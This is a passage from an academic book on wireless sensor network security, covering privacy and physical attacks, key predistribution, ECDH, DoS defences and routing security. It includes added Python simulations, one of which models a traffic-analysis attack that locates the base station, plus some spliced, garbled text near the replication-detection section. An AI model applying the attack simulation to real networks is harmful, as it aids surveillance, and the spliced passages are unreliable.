Sensor network technology promises a vast increase in automatic data collection capabilities through efficient deployment of tiny sensor devices. While these technologies offer great benefits to users, they also exhibit significant potential for abuse. Particularly relevant concerns are privacy problems, since sensor networks provide increased data collection capabilities (Gruteser 2003). Adversaries can use even seemingly innocuous data to derive sensitive information if they know how to correlate multiple sensor inputs. For example, in the famous "panda-hunter problem" (Ozturk 2004), the hunter can infer the position of pandas by monitoring the traffic. The main privacy problem, however, is not that sensor networks enable the collection of information. In fact, much information from sensor networks could probably be collected through direct site surveillance. Rather, sensor networks aggravate the privacy problem because they make large volumes of information easily available through remote access. Hence, adversaries need not be physically present to maintain surveillance. They can gather information in a low-risk, anonymous manner. Remote access also allows a single adversary to monitor multiple sites simultaneously (Chan 2003). Some of the more common attacks (Chan 2003; Gruteser 2003) against sensor privacy are:

• Monitor and eavesdropping: This is the most obvious attack on privacy. By listening to the data, the adversary could easily discover the communication contents. When the traffic conveys control information about the sensor network configuration, which contains potentially more detailed information than is accessible through the location server, eavesdropping can act effectively against the privacy protection.
• Traffic analysis: Traffic analysis is typically combined with monitoring and eavesdropping. An increase in the number of transmitted packets between certain nodes could signal that a specific sensor has registered activity. Through analysis of the traffic, some sensors with special roles or activities can be effectively identified.
• Camouflage: Adversaries can insert their own node or compromise existing nodes to hide in the sensor network. After that, these nodes can masquerade as a normal node to attract the packets, then misroute the packets, for example, forward the packets to the nodes conducting the privacy analysis.
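The rate monitoring attack described under Traffic Analysis Attacks, and the traffic analysis item in the privacy list above, as an added simulation that is not the chapter's code or Deng et al.'s: over a constructed routing tree rooted at the base station, each node's transmissions per round equal the size of its subtree, and an eavesdropper who only counts frames (never reading payloads) steps to the busiest neighbour until no neighbour is busier; the single silent neighbour of the node it ends on is the base station. The tree, and the assumption that the attacker can attribute overheard frames to their link-layer sender, are constructed for illustration.

```python
from collections import defaultdict

# Constructed routing tree: child -> parent. Node 0 is the base station.
PARENT = {1: 0, 2: 0, 3: 1, 4: 1, 5: 2, 6: 3, 7: 3, 8: 5, 9: 5, 10: 9}


def neighbors(parent):
    """Undirected adjacency of the tree (parent and children of each node)."""
    nb = defaultdict(set)
    for child, par in parent.items():
        nb[child].add(par)
        nb[par].add(child)
    return nb


def transmissions_per_round(parent):
    """Every node reports once per round; each report is retransmitted at
    every hop on its way to the sink, so a node's count is its subtree size.
    The sink only receives and is left at zero."""
    tx = defaultdict(int)
    for node in parent:
        cur = node
        while cur in parent:          # walk up until the sink is reached
            tx[cur] += 1
            cur = parent[cur]
    return tx


def rate_monitoring_attack(start, parent, tx):
    """Eavesdropper's walk: from `start`, move to the neighbour that sends
    the most frames while one sends more than the current node; the quiet
    neighbour of the busiest node reached is the suspected base station."""
    nb = neighbors(parent)
    cur = start
    while True:
        busier = [n for n in nb[cur] if tx[n] > tx[cur]]
        if not busier:
            break
        cur = max(busier, key=lambda n: tx[n])
    quiet = [n for n in nb[cur] if tx[n] == 0]
    return quiet[0] if len(quiet) == 1 else None


def attack_from_every_node(parent):
    """Map of starting node -> node the attacker identifies as the sink."""
    tx = transmissions_per_round(parent)
    return {start: rate_monitoring_attack(start, parent, tx) for start in parent}
```

In this tree the two children of the sink each forward five frames per round and every leaf sends one, so the walk always terminates next to node 0 regardless of where the attacker starts; encryption does not change any of these counts. Countermeasures in the literature work by breaking exactly this monotonic gradient, for example with dummy traffic or randomized forwarding, which is why the chapter lists combating traffic analysis as a separate defence.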


Physical Attacks

Sensor networks typically operate in hostile outdoor environments. In such environments, the small form factor of the sensors, coupled with the unattended and distributed nature of their deployment, makes them highly susceptible to physical attacks, that is, threats due to physical node destruction (Wang 2004).

Unlike many other attacks mentioned above, physical attacks destroy sensors permanently, so the losses are irreversible. For instance, attackers can extract cryptographic secrets, tamper with the associated circuitry, modify programming in the sensors, or replace them with malicious sensors under the control of the attacker (Wang 2004). Recent work has shown that standard sensor nodes, such as the MICA2 motes, can be compromised in less than one minute (Hartung 2004). While these results are not surprising given that the MICA2 lacks tamper-resistant hardware protection, they provide a cautionary note about the speed of a well-trained attacker. If an adversary compromises a sensor node, then the code inside the physical node may be modified.

Countermeasures

Now we are in a position to describe the measures for satisfying security requirements and protecting the sensor network from attacks. We start with key establishment in wireless sensor networks, which lays the foundation for the security of a wireless sensor network, followed by defending against DoS attacks, secure broadcasting and multicasting, defending against attacks on routing protocols, combating traffic analysis attacks, defending against attacks on sensor privacy, intrusion detection, secure data aggregation, defending against physical attacks, and trust management.

Key Management Fundamentals

Key management issues in wireless networks are not unique to wireless sensor networks. Indeed, key establishment and management issues have been studied in depth outside of the wireless networking arena. Traditionally, key establishment is done using one of many public-key protocols. One of the more common is the Diffie-Hellman public key protocol, but there are many others. Most of the traditional techniques, however, are unsuitable in low-power devices such as wireless sensor networks. This is due largely to the fact that typical key exchange techniques use asymmetric cryptography, also called public key cryptography. In this case, it is necessary to maintain two mathematically related keys, one of which is made public while the other is kept private. This allows data to be encrypted with the public key and decrypted only with the private key. The problem with asymmetric cryptography, in a wireless sensor network, is that it is typically too computationally intensive for the individual nodes in a sensor network. This is true in the general case; however, Gaubatz (2004), Gura (2004), Malan (2004), and Watro (2004) show that it is feasible with the right selection of algorithms.

Symmetric cryptography is therefore the typical choice for applications that cannot afford the computational complexity of asymmetric cryptography. Symmetric schemes utilize a single shared key known only to the two communicating hosts. This shared key is used for both encrypting and decrypting data. The traditional example of symmetric cryptography is the data encryption standard (DES). The use of DES, however, is quite limited due to the fact that its 56-bit key can be brute-forced relatively easily. In light of the shortcomings of DES, other symmetric cryptography systems have been proposed, including triple DES (3DES), RC5, AES, and so on.

One major shortcoming of symmetric cryptography is the key exchange problem. Simply put, the key exchange problem derives from the fact that two communicating hosts must somehow know the shared key before they can communicate securely. So the problem that arises is how to ensure that the shared key is indeed shared between the two hosts who wish to communicate and no other rogue hosts who may wish to eavesdrop. How to distribute a shared key securely to communicating hosts is a nontrivial problem, since predistributing the keys is not always feasible.

Key Establishment

One security aspect that receives a great deal of attention in wireless sensor networks is the area


of key management. Wireless sensor networks are unique (among other embedded wireless networks) in this aspect due to their size, mobility, and computational/power constraints. Indeed, researchers envision wireless sensor networks to be orders of magnitude larger than their traditional embedded counterparts. This, coupled with the operational constraints described previously, makes secure key management an absolute necessity in most wireless sensor network designs. Because encryption and key management/establishment are so crucial to the defense of a wireless sensor network, with nearly all aspects of wireless sensor network defenses relying on solid encryption, we first begin with an overview of the unique key and encryption issues surrounding wireless sensor networks before discussing more specific sensor network defenses.

WSN Key Management Protocols

Random key predistribution schemes have several variants. Eschenauer and Gligor (2002) propose a key predistribution scheme that relies on probabilistic key sharing among nodes within the sensor network. Their system works by distributing a key ring to each participating node in the sensor network before deployment. Each key ring consists of a number of randomly chosen keys from a much larger pool of keys generated offline. An enhancement to this technique utilizing multiple keys is described by Chan (2003). Further enhancements are proposed by Deng (2005) and Liu (2005), with additional analysis and enhancements provided by Hwang (2004). Using this technique, it is not necessary that each pair of nodes share a key. However, any two nodes that do share a key may use the shared key to establish a direct link to one another. Eschenauer and Gligor show that, while not perfect, it is probabilistically likely that large sensor networks will enjoy shared-key connectivity. Further, they demonstrate that such a technique can be extended to key revocation, rekeying, and the addition/deletion of nodes. The LEAP protocol described by Zhu et al. (2003) takes an approach that utilizes multiple keying mechanisms. Their observation is that no single security requirement accurately suits all types of communication in a wireless sensor network. Therefore, four different keys are used depending on whom the sensor node is communicating with. Sensors are preloaded with an initial key from which further keys can be established. As a security precaution, the initial key can be deleted after its use in order to ensure that a compromised sensor cannot add additional compromised nodes to the network.

In PIKE (Chan 2005), Chan and Perrig describe a mechanism for establishing a key between two sensor nodes that is based on the common trust of a third node somewhere within the sensor network. The nodes and their shared keys are spread over the network such that for any two nodes A and B, there is a node C that shares a key with both A and B. Therefore, the key establishment protocol between A and B can be securely routed through C.

Huang et al. (2003) propose a hybrid key establishment scheme that makes use of the difference in computational and energy constraints between a sensor node and the base station. They posit that an individual sensor node possesses far less computational power and energy than a base station. In light of this, they propose placing the major cryptographic burden on the base station, where the resources tend to be greater. On the sensor side, symmetric-key operations are used in place of their asymmetric alternatives. The sensor and the base station authenticate based on elliptic curve cryptography. Elliptic curve cryptography is often used in sensors due to the fact that relatively small key lengths are required to achieve a given level of security.

Huang et al. also use certificates to establish the legitimacy of a public key. The certificates are based on an elliptic curve implicit certificate scheme (Huang et al., 2003). Such certificates are useful to ensure both that the key belongs to a device and that the device is a legitimate member of the sensor network. Each node obtains a certificate before joining the network using an out-of-band interface.
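The probabilistic key sharing of Eschenauer and Gligor, as an added example that is not the authors' implementation: it draws key rings from a pool, computes the closed-form probability that two rings overlap, 1 - ((P-k)!)^2 / ((P-2k)! P!), checks it against a Monte Carlo estimate, and, for two nodes that share nothing directly, lists the third nodes that share a key with both, which is the situation PIKE's routing through a common node addresses. Pool size, ring size, node count and the RNG seed are constructed for illustration; real rings would hold key material, not just identifiers.

```python
import math
import random


def key_ring(pool_size, ring_size, rng):
    """Draw a ring of distinct key identifiers from the offline pool."""
    return frozenset(rng.sample(range(pool_size), ring_size))


def share_probability(pool_size, ring_size):
    """Probability that two random rings of size k from a pool of P overlap:
    1 - ((P-k)!)^2 / ((P-2k)! P!), evaluated with log-gamma to avoid overflow."""
    P, k = pool_size, ring_size
    if 2 * k > P:
        return 1.0                      # rings are too large to be disjoint
    log_miss = (2 * math.lgamma(P - k + 1) - math.lgamma(P - 2 * k + 1)
                - math.lgamma(P + 1))
    return 1.0 - math.exp(log_miss)


def shared_keys(ring_a, ring_b):
    """Shared-key discovery: identifiers present in both rings."""
    return ring_a & ring_b


def simulate(pool_size, ring_size, pairs, seed=1):
    """Monte Carlo estimate of share_probability over `pairs` random pairs."""
    rng = random.Random(seed)
    hits = sum(1 for _ in range(pairs)
               if shared_keys(key_ring(pool_size, ring_size, rng),
                              key_ring(pool_size, ring_size, rng)))
    return hits / pairs


def deploy(n_nodes, pool_size, ring_size, seed=1):
    """Constructed deployment: node id -> key ring loaded before deployment."""
    rng = random.Random(seed)
    return {node: key_ring(pool_size, ring_size, rng) for node in range(n_nodes)}


def connectivity(rings):
    """Fraction of node pairs that can set up a direct link from a shared key."""
    ids = sorted(rings)
    pairs = [(a, b) for i, a in enumerate(ids) for b in ids[i + 1:]]
    return sum(1 for a, b in pairs if shared_keys(rings[a], rings[b])) / len(pairs)


def path_key_candidates(rings, a, b):
    """Nodes c that share a key with both a and b and could relay a path-key
    setup between them when a and b hold no key in common."""
    return [c for c in rings if c not in (a, b)
            and shared_keys(rings[a], rings[c]) and shared_keys(rings[b], rings[c])]
```

With the pool and ring sizes the original paper discusses (a pool of 10,000 and rings of 75), the closed form gives roughly 0.43, so the scheme relies on the graph of shared keys being connected rather than on every pair sharing a key. The candidate list also shows the scheme's weakness: a captured node's ring reveals keys that other pairs depend on, which is why the text mentions revocation and rekeying as part of the design.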


WSN and Public Key Cryptography

Two of the major techniques used to implement public-key cryptosystems are RSA and elliptic curve cryptography (ECC). Traditionally, these have been thought to be far too heavyweight for use in wireless sensor networks.

Recently, however, several groups have successfully implemented public-key cryptography (to varying degrees) in wireless sensor networks. Gura et al. (2004) report that both RSA and elliptic curve cryptography are possible using 8-bit CPUs, with ECC demonstrating a performance advantage over RSA. Another advantage is that ECC's 160-bit keys result in shorter messages during transmission compared to the 1024-bit RSA keys. In particular, Gura et al. demonstrate that the point multiplication operations in ECC are an order of magnitude faster than private-key operations within RSA, and are comparable (though somewhat slower) to the RSA public-key operation.

Watro et al. (2004) show that portions of the RSA cryptosystem can be successfully applied to actual wireless sensors, specifically the UC Berkeley MICA2 motes (Hill et al., 2000). In particular, they implemented the public operations on the sensors themselves while offloading the private operations to devices better suited for the larger computational tasks. In this case, a laptop was used. The TinyPK system described by Watro (2004) is designed specifically to allow authentication and key agreement between resource-constrained sensors. The agreed-upon keys may then be used in conjunction with the existing cryptosystem, TinySec (Karlof 2003). To do this, they implement the Diffie-Hellman key exchange algorithm and perform the public-key operations on the Berkeley motes.

The Diffie-Hellman key exchange algorithm used by Malan et al. (2004) is detailed in the following. In this case, a point G is selected from an elliptic curve E, both of which are public. A random integer KA is selected, which will act as the private key. The public key (TA in the case of the sender) is then TA = KA * G. The receiver performs a similar set of operations to compute TB = KB * G. Both peers can now easily compute the shared secret using their own private keys and the public keys that have been exchanged. In this case, the sender computes KA * TB = KA * KB * G while the receiver computes KB * TA = KB * KA * G. Because KA * TB = KB * TA, the sender and the receiver now share a secret key.

DoS Countermeasures

Since denial-of-service attacks are so common, effective defenses must be available to combat them. One strategy in defending against the classic jamming attack is to identify the jammed part of the sensor network and effectively route around the unavailable portion. Wood and Stankovic (2002) describe a two-phase approach where the nodes along the perimeter of the jammed region report their status to their neighbors, who then collaboratively define the jammed region and simply route around it. To handle jamming at the MAC layer, nodes might utilize a MAC admission control that is rate limiting. This would allow the network to ignore those requests designed to exhaust the power reserves of a node. This, however, is not fool-proof, as the network must be able to handle any legitimately large traffic volumes.

Overcoming rogue sensors that intentionally misroute messages can be done at the cost of redundancy. In this case, a sending node can send the message along multiple paths in an effort to increase the likelihood that the message will ultimately arrive at its destination. This has the advantage of effectively dealing with nodes that may not be malicious, but rather may have simply failed, as it does not rely on a single node to route its messages. To overcome the transport layer flooding denial-of-service attack, Aura, Nikander and Leiwo (2001) suggest using the client puzzles posed by Juels and Brainard in an effort to discern a node's commitment to making the connection by utilizing some of its own resources. Aura et al. advocate that a server should force a client to commit its own resources first. Further, they suggest that a server should always force a client to commit more resources up front than the server. This strategy would likely be effective as long as the client has computational resources comparable to those of the server.
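The elliptic curve Diffie-Hellman exchange written out above (TA = KA * G, TB = KB * G, shared secret KA * TB = KB * TA), as an added example that is not the code of Malan et al. or of TinyPK: it implements point addition and double-and-add scalar multiplication over a deliberately tiny textbook curve, y² = x³ + 2x + 2 over GF(17) with generator G = (5, 1) of order 19, so every intermediate point can be checked by hand. The curve and the private keys 7 and 3 are assumptions for illustration only and offer no security; the 160-bit fields the text mentions are the smallest used in practice, and private keys must come from a cryptographic RNG.

```python
# Toy curve y^2 = x^3 + A*x + B over GF(P_MOD); G generates a group of order 19.
# Chosen because it is small enough to verify by hand; it is NOT secure.
P_MOD, A, B = 17, 2, 2
G = (5, 1)
ORDER = 19


def inv(x):
    """Modular inverse via Fermat; only called on non-zero residues."""
    return pow(x % P_MOD, P_MOD - 2, P_MOD)


def on_curve(pt):
    if pt is None:                      # the point at infinity
        return True
    x, y = pt
    return (y * y - (x ** 3 + A * x + B)) % P_MOD == 0


def point_add(p1, p2):
    """Group law in affine coordinates; None represents the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None                     # P + (-P) = infinity (covers y = 0)
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * inv(2 * y1) % P_MOD      # tangent slope
    else:
        lam = (y2 - y1) * inv(x2 - x1) % P_MOD             # chord slope
    x3 = (lam * lam - x1 - x2) % P_MOD
    y3 = (lam * (x1 - x3) - y1) % P_MOD
    return (x3, y3)


def scalar_mult(k, point):
    """Double-and-add: the point multiplication whose cost dominates ECC.
    (Real implementations use a constant-time ladder to avoid timing leaks.)"""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def ecdh(ka, kb):
    """Both sides of the exchange from the text. Returns (sender's secret,
    receiver's secret); they are equal because KA * (KB * G) = KB * (KA * G)."""
    ta = scalar_mult(ka, G)             # sender's public key   TA = KA * G
    tb = scalar_mult(kb, G)             # receiver's public key TB = KB * G
    return scalar_mult(ka, tb), scalar_mult(kb, ta)
```

On this curve 7 * 3 = 21 = 2 (mod 19), so both sides end up at 2G = (6, 3); with a real curve the shared point is hashed into a symmetric key, which is the key that the text says is then handed to TinySec.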


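The client-puzzle defense against transport-layer flooding discussed under DoS Countermeasures, as an added example that is not the published construction of Aura, Nikander and Leiwo or of Juels and Brainard: the server derives each puzzle nonce from a secret so it stores nothing per pending client, the client must find an 8-byte suffix whose SHA-256 hash with the nonce has a chosen number of leading zero bits, and verification costs the server a single hash plus a lookup in a set of already used solutions. The 12-bit difficulty, the server secret and the client identifiers are constructed for illustration.

```python
import hashlib
import hmac


def leading_zero_bits(digest):
    """Number of leading zero bits of a 32-byte digest."""
    return 256 - int.from_bytes(digest, "big").bit_length()


class PuzzleServer:
    """Stateless puzzle issuance, cheap verification. The client's expected
    work is about 2**difficulty hashes; the server's is one HMAC and one hash."""

    def __init__(self, secret, difficulty):
        self.secret = secret
        self.difficulty = difficulty
        self.solved = set()              # (nonce, solution) pairs already accepted

    def _nonce(self, client_id, epoch):
        # Derived, not stored: the server can recompute it when the answer
        # arrives, so a flood of unanswered puzzles costs it no memory.
        msg = f"{client_id}:{epoch}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).digest()[:8]

    def issue(self, client_id, epoch):
        return self._nonce(client_id, epoch), self.difficulty

    def verify(self, client_id, epoch, solution):
        nonce = self._nonce(client_id, epoch)
        if (nonce, solution) in self.solved:
            return False                 # a solution may only buy one connection
        if leading_zero_bits(hashlib.sha256(nonce + solution).digest()) < self.difficulty:
            return False
        self.solved.add((nonce, solution))
        return True


def solve(nonce, difficulty):
    """Client side: brute force the suffix. Returns (solution, hashes tried)."""
    x = 0
    while True:
        candidate = x.to_bytes(8, "big")
        if leading_zero_bits(hashlib.sha256(nonce + candidate).digest()) >= difficulty:
            return candidate, x + 1
        x += 1


def handshake(server, client_id, epoch):
    """One legitimate client run: fetch puzzle, solve it, present the answer."""
    nonce, difficulty = server.issue(client_id, epoch)
    solution, tries = solve(nonce, difficulty)
    return server.verify(client_id, epoch, solution), tries
```

The epoch bounds how long a solution stays valid and lets the `solved` set be pruned, and the difficulty can be raised under load so the client's commitment always exceeds the server's. The caveat the text states still holds: a puzzle only helps while the attacker's hashing budget is not far larger than the server's, which is a real concern when the "server" is a sensor node.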
casting strategy. In the simple node broadcasting 2. Developing scalable security mechanisms:
strategy each sensor propagates an authenticated broadcast message throughout the entire sensor network. Any node that receives a conflicting or duplicated claim revokes the conflicting nodes. This strategy will work, but the communication cost is far too expensive. In order to reduce the communication cost, a deterministic multicast could be employed where nodes would share their locations with a set of witness nodes. In this case, witnesses are computed based on a node's ID. In the event that a node has been replicated on the network, two conflicting locations will be forwarded to the same witness, who can then revoke the offending nodes. But since the witness set is derived from a node's ID, it can easily be computed by an attacker, who can then compromise the witness nodes. Thus, securely utilizing a deterministic multicast strategy would require too many witnesses, and the communication cost would again be too high.

FUTURE TRENDS

Research on WSN security is still in its infancy. Many key issues have not been sufficiently detailed, or have even remained unexplored. In the near future, advanced security features may be built into the sensor nodes available in the market. While their prospects look bright, these security functionalities have surprisingly received little attention from the research community. In the following, we describe the WSN-related research aspects that we consider most interesting.

1. Building security policies for WSNs: Due to their ad hoc topology, WSNs cannot conform to traditional rigid security policies. WSN-oriented security policies should be flexible enough to support the continuously modified network constituency and structure. The WSN architecture should therefore be flexible in its support of security policies, providing sufficient mechanisms for supporting the wide variety of real-world security policies. Appropriate formalisms to build, model, validate, verify, and test such architectures should be evolved.

A common practice is to use exaggerated tools of information security, which decrease efficiency or system availability and introduce redundancy. Another effect of exaggerating the security mechanisms is increased system complexity, which later influences the implementation of a given project in practice, especially by increasing expenses and decreasing efficiency. The solution to this inconsistency seems to be the introduction of a scalable security model, which can change the security level depending on the particular conditions of a given case. In this chapter a mechanism which can modify the level of information security for each phase of a protocol is presented. The parameters which influence modification of the security level are the risk of a successful attack, the probability of a successful attack, and some measure of the independence (leading to completeness) of the security elements. The security elements used, which take care of the protection of information, are based mainly on PKI services and cryptographic modules.

3. Securing hybrid broadband wireless sensor networks (HBWSNs): High-speed WSNs are beginning to be widely used in different applications. Securing the corresponding flows encompasses the development of novel concepts that do not rely on thorough inspection of the transmitted packets but rather on the control of a set of relevant samples that are representative of the total flow.

4. Defining secure correlation functions: Two novel aspects are being investigated in the field of WSN security: blind correlation and recursive signature. The first consists in correlating encrypted events without revealing their content, in order to optimize the use of networking and processing resources. The second is applicable when, within a transmission chain, a set of nodes recursively sign the event. This is a particularly challenging problem in the WSN context because the intermediary nodes are resource-impoverished.
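As an added illustration of the witness-based replication detection discussed at the start of this section (example code written for this edited page, not taken from the chapter or from the scheme it summarizes): a node's location claim is authenticated with a MAC under an assumed shared network key, the witness set is derived deterministically from the node ID by hashing, and a witness revokes an ID as soon as it holds two authenticated claims for that ID at different locations. The message count is returned alongside the flooding cost so the two strategies can be compared, and witnesses_for exposes the weakness mentioned above: an attacker can compute exactly which witnesses to compromise. The network size, witness count, key, node locations, and the clone of node 7 are all constructed for the example.

```python
import hashlib
import hmac

# Constructed parameters for this example (not taken from the chapter).
NUM_NODES = 64                                 # nodes in the deployed network
NUM_WITNESSES = 3                              # witnesses assigned to each node ID
NETWORK_KEY = b"assumed-shared-network-key"    # assumption: claims are MACed under a network key


def witnesses_for(node_id, n_nodes=NUM_NODES, k=NUM_WITNESSES):
    """Deterministic witness set derived from the node ID alone.

    Any party that knows the ID, including an attacker, can recompute the
    same set; this predictability is the weakness discussed in the text."""
    chosen = []
    counter = 0
    while len(chosen) < k:
        digest = hashlib.sha256(f"{node_id}:{counter}".encode()).digest()
        candidate = int.from_bytes(digest[:4], "big") % n_nodes
        if candidate != node_id and candidate not in chosen:
            chosen.append(candidate)
        counter += 1
    return chosen


def _claim_body(node_id, loc):
    return f"{node_id}|{loc[0]}|{loc[1]}".encode()


def make_claim(node_id, loc):
    """Location claim <ID, location, MAC>; the MAC stands in for the
    authentication of the broadcast scheme described in the text."""
    tag = hmac.new(NETWORK_KEY, _claim_body(node_id, loc), hashlib.sha256).hexdigest()
    return {"id": node_id, "loc": tuple(loc), "tag": tag}


def verify_claim(claim):
    expected = hmac.new(NETWORK_KEY, _claim_body(claim["id"], claim["loc"]),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, claim["tag"])


class Witness:
    """Stores the first authenticated location per ID and revokes an ID as
    soon as a second, different authenticated location arrives for it."""

    def __init__(self):
        self.seen = {}          # node ID -> first accepted location
        self.revoked = set()

    def receive(self, claim):
        if not verify_claim(claim):
            return "rejected"           # forged or tampered claim
        node_id, loc = claim["id"], claim["loc"]
        if node_id in self.revoked:
            return "revoked"
        first = self.seen.setdefault(node_id, loc)
        if first != loc:
            self.revoked.add(node_id)   # same ID claimed at two places: a replica
            return "revoked"
        return "stored"


def run_detection(claims, n_nodes=NUM_NODES, k=NUM_WITNESSES):
    """Forward each claim to the witnesses of its ID (deterministic multicast).

    Returns (revoked IDs, number of claim deliveries) so the cost can be
    compared with flooding, which delivers every claim to all n_nodes."""
    witnesses = {w: Witness() for w in range(n_nodes)}
    delivered = 0
    for claim in claims:
        for w in witnesses_for(claim["id"], n_nodes, k):
            witnesses[w].receive(claim)
            delivered += 1
    revoked = set().union(*(w.revoked for w in witnesses.values()))
    return revoked, delivered


def flooding_cost(num_claims, n_nodes=NUM_NODES):
    """Delivery count of the broadcast strategy: every claim reaches every node."""
    return num_claims * n_nodes


def demo():
    # Constructed deployment: node i honestly reports location (i, i % 8) ...
    claims = [make_claim(i, (i, i % 8)) for i in range(NUM_NODES)]
    # ... and node 7 has been cloned: the clone reports a second location.
    claims.append(make_claim(7, (40, 1)))
    revoked, delivered = run_detection(claims)
    return {
        "revoked": revoked,
        "multicast_messages": delivered,
        "flooding_messages": flooding_cost(len(claims)),
        # The witnesses an attacker must compromise to hide the clone of node 7:
        "witnesses_an_attacker_can_target": witnesses_for(7),
    }


if __name__ == "__main__":
    print(demo())
```

Running the block revokes only node 7 after 195 claim deliveries, against 4160 for flooding, and lists the three witness IDs an attacker would target. Raising NUM_WITNESSES increases the number of nodes the attacker must compromise but scales the delivery count linearly, which is exactly the tradeoff the text describes.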


Security and Privacy in Wireless Sensor Networks: Challenges and Solutions

KEY TERMS

Camouflage: Adversaries can insert their own node or compromise existing nodes to hide in the sensor network. These nodes can then masquerade as a normal node to attract packets and misroute them.

Denial-of-Service Attack: An attack aiming at disrupting the acquisition of information within a geographical zone or preventing the communication of alert and signalling messages between sensor nodes.

Key Management: Process of generating, validating, exchanging, and renewing asymmetric and symmetric keys.

Rate Monitoring Attack: A rate monitoring attack simply makes use of the idea that nodes closest to the base station tend to forward more packets than those farther away from the base station.

Wireless Sensor Network (WSN): Dense collection of tiny sensor motes deployed in a region of interest to gather information about a specific phenomenon for later analysis. WSNs allow efficient, distributed, and collaborative control of various natural and human events.

Wormhole Attack: In a wormhole attack, an attacker receives packets at one point in the network, "tunnels" them to another point in the network, and then replays them into the network from that point.




Chapter XXXVI
Routing Security in Wireless
Sensor Networks
A.R. Naseer
King Fahd University of Petroleum & Minerals, Dhahran

Ismat K. Maarouf
King Fahd University of Petroleum & Minerals, Dhahran

Ashraf S. Hasan
King Fahd University of Petroleum & Minerals, Dhahran

ABSTRACT

Since routing is a fundamental operation in all types of networks, ensuring routing security is a necessary requirement to guarantee the success of the routing operation. Securing the routing task gets more challenging as the target network lacks an infrastructure-based routing operation. This infrastructure-less nature, which invites a multihop routing operation, is one of the main features of wireless sensor networks that raises the importance of the secure routing problem in these networks. Moreover, the risky environment, application criticality, and resource limitations and scarcity exhibited by wireless sensor networks make the task of secure routing much more challenging. All these factors motivate researchers to find [...] and approaches that would be different from the usual approaches adopted in other types of networks. The purpose of this chapter is to provide a comprehensive treatment of the routing security problem in wireless sensor networks. The discussion of the problem in this chapter begins with [...] on wireless sensor networks that focuses on routing aspects, to indicate the special characteristics of wireless sensor networks from the routing perspective. The chapter then introduces the problem of secure routing in wireless sensor networks and illustrates how crucial the problem is to different networking aspects. This is followed by a detailed analysis of the routing threats and attacks that [...] routing operation in wireless sensor networks. A research-guiding approach is then presented to the reader that analyzes and criticizes different techniques and solution directions for the secure routing problem in wireless sensor networks. This is supported by state-of-the-art and familiar examples from the literature. The chapter finally concludes with a summary and future research directions.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Routing Security in Wireless Sensor Networks

INTRODUCTION

Wireless sensor networks (WSNs) are gaining popularity due to the fact that they provide a feasible and economical solution to many of the most challenging problems in a wide variety of applications such as military applications, healthcare, traffic monitoring, pollution/weather monitoring, wildlife tracking, remote sensing, and so forth. This has fuelled extensive research to address the critical issues of providing security, intrusion detection/tolerance, high availability, and survivability of the sensor network.

The issue of secure routing in wireless and mobile computing is a major challenging design factor in different networking aspects. However, the problem gets more complicated when considering infrastructure-less networks that exhibit even more constraints and new types of attacks. In the continuously and rapidly evolving area of wireless communication, the field of wireless sensor networks comes into the picture as a very hot area of research in all its aspects. A WSN is a multihop network that is actually one type of ad hoc network. However, WSNs draw the special attention of researchers due to the fact that they exhibit more constraints and critical conditions than normal ad hoc networks in terms of power sources, computing capabilities, memory capacity, and other factors. This requires different approaches and protocol engineering directions from those applied to normal ad hoc networks.

WSNs are susceptible to several types of attacks at different layers of the network since they are normally deployed in open and unprotected environments and are constituted of cheap small devices with limited computational power, limited memory, and limited battery life. Nodes of a sensor network cannot be trusted for the correct execution of the critical network functions. Node misbehavior may range from simple selfishness or lack of collaboration due to the need for power saving, to active attacks aiming at denial-of-service and subversion of traffic. A sensor network without sufficient protection from these attacks may not be deployable in many areas. Intrusion prevention mechanisms such as encryption and authentication can be applied to protect WSNs against some types of attacks. Key management is the cornerstone of security services such as encryption and authentication in wireless sensor networks. Research seeking low-cost key management techniques that can survive node compromises in sensor networks has been a very active area, yielding several novel key predistribution schemes. However, there are some attacks for which there is no known prevention method, such as the wormhole attack. Moreover, there is no guarantee that the preventive methods will be able to hold off intruders. Hence it is necessary to use some mechanism of intrusion detection. Besides preventing the intruder from causing damage to the network, the intrusion detection system can acquire information related to the attack techniques, helping in the development of better prevention systems.

One special aspect in WSN is the provision of secure routing. As mentioned previously, the nature of WSN complicates the security requirements and adds difficulties in solving security problems. In fact, secure routing in WSN is still not captured well in the research field. One main reason is that the design of a routing protocol is biased towards solving the problem of power limitations and reducing communication overhead, while keeping security concerns for a later phase to be integrated with the current routing solutions.

Among the different approaches to solving the problem of secure routing in WSN, the reputation system-based solution is one technique that has generated considerable interest in the WSN research community. Reputation systems attempt to provide security by allowing different nodes to rate each other based on their routing activities and behavior analysis. When a node has an experience profile about its neighbors, it may select the node that it trusts more and, hence, achieve a secure routing operation.

The rest of the chapter is organized as follows. Section 2 of the chapter provides the relevant background material covering an overview of WSN that includes the WSN definition, sensor node structure, applications, and so forth. As WSN is a class of mobile ad hoc networks (MANET), the main differences between WSN and MANET will
be presented. These differences are explained in a way that emphasizes to the reader how they make WSN an independent research target as compared with MANET.

Section 3, being the routing security section, defines precisely the problem of secure routing in general. This section will discuss the requirements for secure routing in WSN. This will be followed by the challenges and constraints in WSN to achieve secure routing. After the reader understands the routing security problem in WSN, the reader will be given a critical discussion about the importance of this problem. This will also include an explanation of the relationship between routing security and different network aspects like survivability, connectivity and network partitioning, throughput, packet delay, and so forth.

Section 4 on routing attacks and threats presents in brief the different possible communication models and trust relationships between WSN nodes that a threat will be based on. It will clearly show how researchers' assumptions on node communication models and node relationships impact the security analysis. In this section, the reader will be provided with a global picture of the approaches and techniques that are used by attackers. This will also include a discussion of the holes and weak points that are exploited to achieve such attacks. Some examples of well-known attacks will be given with explanation. The explanation will focus on how the attack works by exploiting aspects of the routing protocol. Thus, the section will also show the robustness level that is provided by different routing protocols. How we can think securely and provide robust solutions against routing attacks and threats will be the subject of this section. The section gives examples of how an attack can be prevented or detected as a tip for a more general approach.

